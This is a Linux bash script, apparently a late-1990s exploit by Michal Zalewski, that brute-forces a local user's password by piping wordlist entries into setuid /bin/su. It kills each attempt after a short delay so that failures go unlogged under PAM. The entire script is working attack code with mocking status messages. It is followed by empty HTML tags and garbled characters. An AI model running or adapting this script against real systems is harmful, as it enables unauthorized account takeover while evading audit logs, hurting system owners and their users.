#!/bin/bash # (c) 1999/2000 # ------------------------------ # # Requirements: # # - working /bin/su # - recent PAM implementation (tested with RedHat 5.x) # - 'usleep' command and bash 1.14.x or 2.0.x # DESTACC='testy' # Account to crack WORDFILE='words' # Wordfile with passwords to test KILLDELAY=03 # Delay (in 1/10 sec) to wait for su (<10) # End of setup. clear echo "RedHat - NothingInLogs[tm] BruteForce(R) Password Crack" echo "-------------------------------------------------------" echo " - (c) 1999/2000, Michal Zalewski - " echo if [ ! "$1" = "" ]; then DESTACC="$1" fi KD=$[KILLDELAY*100000] echo "[+] Configured against user '$DESTACC', wordfile: $WORDFILE" echo "[+] Kill-delay set to $KD usecs..." id "$DESTACC" &>/dev/null if [ ! "$?" = "0" ]; then echo "[-] Hmm, user '$DESTACC' not found, paranoia?" echo exit 0 fi SHL="`grep "^$DESTACC:" /etc/passwd|awk -F: '{print $7}'`" if [ ! "$SHL" = "/bin/bash" ]; then echo "[-] Hmm, user '$DESTACC' has $SHL set as shell, expect problems..." fi echo "[+] Destination account is alive and well..." if [ ! -f "$WORDFILE" ]; then echo "[-] Wordfile '$WORDFILE' not found, check it." echo exit 0 fi if [ ! -u /bin/su ]; then echo "[-] Can't find +s on /bin/su, hack me." echo exit 0 fi if [ ! -x /bin/su ]; then echo "[-] Haven't +x on /bin/su, hack me." echo exit 0 fi echo "[+] /bin/su seems to be executable and setuid, hopefully it works..." if [ ! -x /bin/usleep ]; then echo "[-] No /bin/usleep in this system. Be a hacker." echo exit 0 fi if [ "$UID" = "0" ]; then echo "[-] Root?! You idiot..." echo exit 0 fi echo "[+] Let's go straight to number one..." LNS="`cat $WORDFILE | wc -l|awk '{print $1}'`" CNT=0 echo "[+] Wordfile '$WORDFILE' loaded - $LNS passwords..." echo "[+] Estimated time: $[LNS*KILLDELAY/25] secs, max: $[LNS*KILLDELAY/10] secs." while [ "$CNT" -lt "$LNS" ]; do CNT=$[CNT+1] PASS="`head -$CNT $WORDFILE|tail -1`" echo -ne "[?] Trying '$PASS' ($CNT/$LNS)... \r" echo "$PASS" | su "$DESTACC" &>/dev/null & usleep $KD kill -9 $! &>/dev/null if [ ! "$?" = "0" ]; then echo echo "[*] Huh, it worked. I've tried password '$PASS' for '$DESTACC'." echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds." echo "[+] Thank You, and hope you enjoyed your stay." echo exit 0 fi done echo "[*] Hmm, end of wordfile, but no matching passwords :(" echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds." echo "[+] Bad day, try again tomorrow?" echo exit 0
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß